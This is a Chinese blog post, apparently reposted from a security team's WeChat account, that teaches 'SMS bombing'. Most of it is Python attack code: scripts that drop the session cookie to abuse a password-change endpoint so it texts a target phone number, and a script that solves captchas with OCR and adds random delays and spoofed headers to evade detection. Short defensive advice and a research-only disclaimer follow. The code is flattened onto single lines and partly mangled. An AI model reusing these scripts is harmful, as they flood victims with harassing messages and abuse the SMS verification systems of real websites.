-
目录 -
什么是“短信轰炸” -
三种批量请求方法 -
被短信轰炸如何应对 -
交流群和免费圈子
import requestslogin_url = '网站url'login_payload = {'username': 'test', 'password': 'test'}login_response = requests.post(login_url, data=login_payload)cookies = login_response.cookiesmodify_password_url = '网站url'modify_payload = {'phone': '电话号码', 'new_password': 'newpass'}if'session_id' in cookies:del cookies['session_id']response = requests.post(modify_password_url, data=modify_payload, cookies=cookies)print(f"尝试修改密码并发送短信,响应:{response.text}")
import requestslogin_url = '网站url'modify_password_url ='网站url的modify_password'login_payload = {'username': 'test', 'password': 'test'}modify_payload = {'phone': '电话号码', 'new_password': 'newpass'}try:login_response = requests.post(login_url, data=login_payload)if login_response.status_code == 200:print("登录成功")cookies = login_response.cookiesif 'session_id' in cookies:del cookies['session_id']print("已删除'session_id'")response = requests.post(modify_password_url, data=modify_payload, cookies=cookies)if response.status_code == 200:print(f"修改密码请求成功,响应内容:{response.text}")else:print(f"修改密码请求失败,状态码:{response.status_code}, 响应内容:{response.text}")else:print(f"登录失败,状态码:{login_response.status_code}, 响应内容:{login_response.text}")except requests.exceptions.RequestException as e:print(f"请求过程中发生错误:{e}")
-
多次发送会被运营商检测并加入黑名单 -
容易暴露自己以及服务器
import requestsimport timeimport randomfrom bs4 import BeautifulSoupfrom PIL import Imageimport pytesseractfrom io import BytesIOpytesseract.pytesseract.tesseract_cmd = r'C:Program Filesmoleyuyu.exe'def get_captcha(session, url, headers):"""获取并识别验证码"""time.sleep(random.uniform(1, 3))response = session.get(url, headers=headers)img = Image.open(BytesIO(response.content))img = img.convert('L')img = img.point(lambda x: 255 if x > 128 else 0)captcha = pytesseract.image_to_string(img).strip()return captchadef main():base_url = "网站url"captcha_url = "网站url"headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36','Referer': base_url,'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',}with requests.Session() as s:s.get(base_url, headers=headers)time.sleep(random.uniform(2, 4))captcha = get_captcha(s, captcha_url, headers)print(f"识别到的验证码:{captcha}")login_data = {'username': 'your_username','password': 'your_password','captcha': captcha,}time.sleep(random.uniform(1, 2))response = s.post(base_url, data=login_data, headers=headers)if '登录成功' in response.text:print("登录成功!")else:print("登录失败,可能需要处理验证码错误")if __name__ == "__main__":main()
4、被短信轰炸如何应对
第一时间拨打你手机号码所属运营商的客服热线,如中国移动 10086、中国联通 10010、中国电信 10000。向客服人员详细说明你遭受短信轰炸的情况,包括短信发送的频率、大概的号码特征等信息。当短信轰炸行为涉及到恶意骚扰、威胁恐吓等内容,或者导致你遭受经济损失(如通过短信链接诱导你进行转账等操作)时,应该及时向公安机关报警。在报警时,要提供完整的证据,包括收到的短信记录(包括短信内容、发送号码、发送时间等),以便警方能够依法立案侦查,追究相关责任人的法律责任。
5、交流群和免费圈子
原文始发于微信公众号(知树安全团队):一文教会你“短信轰炸”程序原理以及脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论